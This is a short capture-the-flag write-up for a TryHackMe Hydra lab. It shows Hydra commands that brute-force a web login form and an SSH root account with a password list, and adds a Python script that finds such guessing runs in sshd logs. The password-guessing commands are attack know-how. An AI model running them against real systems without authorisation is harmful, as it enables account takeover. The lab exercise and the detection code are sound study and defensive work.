
THM - Hydra

Flag 01: To brute-force a web login password, we must first know which type of request the login form makes. GET and POST are the commonly used methods. With that known, we use the command sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"

Got the flag.

Flag 02: To brute-force SSH, we run the command hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh

Password found. Now log in.
Got the flag.
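
As an added example (not part of the original write-up), this is how the SSH guessing run above looks from the defender's side: a small Python script that counts failed sshd password attempts per source IP and flags a successful login that follows a burst of failures. The log lines are constructed samples, and the function name and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (not from the original post); IPs are documentation ranges.
SAMPLE_LOG = "\n".join(
    [f"Jan 10 10:00:{s:02d} host sshd[{1000 + s}]: Failed password for root "
     f"from 203.0.113.7 port {40000 + s} ssh2" for s in range(6)]
    + ["Jan 10 10:00:07 host sshd[1007]: Accepted password for root "
       "from 203.0.113.7 port 40007 ssh2",
       # A user who mistyped once and then logged in: must not be flagged.
       "Jan 10 10:05:00 host sshd[1100]: Failed password for alice "
       "from 198.51.100.20 port 51000 ssh2",
       "Jan 10 10:05:09 host sshd[1101]: Accepted password for alice "
       "from 198.51.100.20 port 51001 ssh2"]
)

# Matches OpenSSH's "Failed/Accepted password for [invalid user] NAME from IP port N".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5):
    """Return per-IP findings for sources with at least `threshold` failures."""
    failures = defaultdict(int)
    targeted = defaultdict(set)
    compromised = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            targeted[ip].add(user)
        elif failures[ip] >= threshold:
            # A success after many failures from one source suggests a guessed password.
            compromised[ip].append(user)
    return {
        ip: {"failures": n, "users": sorted(targeted[ip]),
             "compromised": compromised[ip]}
        for ip, n in failures.items() if n >= threshold
    }

if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

An account listed under "compromised" should have its password rotated and its session history reviewed, not just the source IP blocked.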

Copyright © 2026 Mahidul Haque. This post is licensed under a CC BY-NC-ND 4.0 license. You may read, learn, and share links to this post for non‑commercial, educational purposes, as long as you give appropriate attribution. You may not copy, reproduce, adapt, distribute, or use this work commercially without explicit permission.